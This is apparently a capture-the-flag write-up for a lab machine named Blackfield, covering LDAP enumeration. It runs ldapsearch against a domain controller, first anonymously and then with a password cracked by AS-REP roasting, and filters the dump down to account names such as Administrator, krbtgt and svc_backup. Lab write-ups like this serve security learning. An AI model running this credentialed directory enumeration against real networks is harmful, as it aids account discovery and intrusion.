CTFLover hack stuff | CTF solutions

20-LDAP

➜  Blackfield ldapsearch -H ldap://10.10.10.192 -x -b "DC=BLACKFIELD,DC=local" 
# extended LDIF
#
# LDAPv3
# base <DC=BLACKFIELD,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A69, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4563

# numResponses: 1

I ll use the password we found in 15-AS-REP Roast with ldap

 Blackfield ldapsearch -H ldap://10.10.10.192 -x -b "DC=BLACKFIELD,DC=local"  -D 'support@blackfield.local' -w '#00^BlackKnight' > ldap_support 
➜  Blackfield wc -l ldap_support 
20362 ldap_support

Found the dc name -> DC01 in the ldap_support file

ldapsearch -H ldap://10.10.10.192 -x -b "DC=BLACKFIELD,DC=local"  -D 'support@blackfield.local' -w '#00^BlackKnight' '(objectClass=Person)' > ldap_support_ObjectClassPerson.txt

Grepped out usernames ->

➜  ldap cat ldap_support_ObjectClassPerson.txt | grep sAMAccountName: | grep -v BLACKFIELD | grep -v PC | grep -v SRV | awk -F:  '{ print $2 }'
 Administrator
 Guest
 DC01$
 krbtgt
 audit2020
 support
 svc_backup
 lydericlefebvre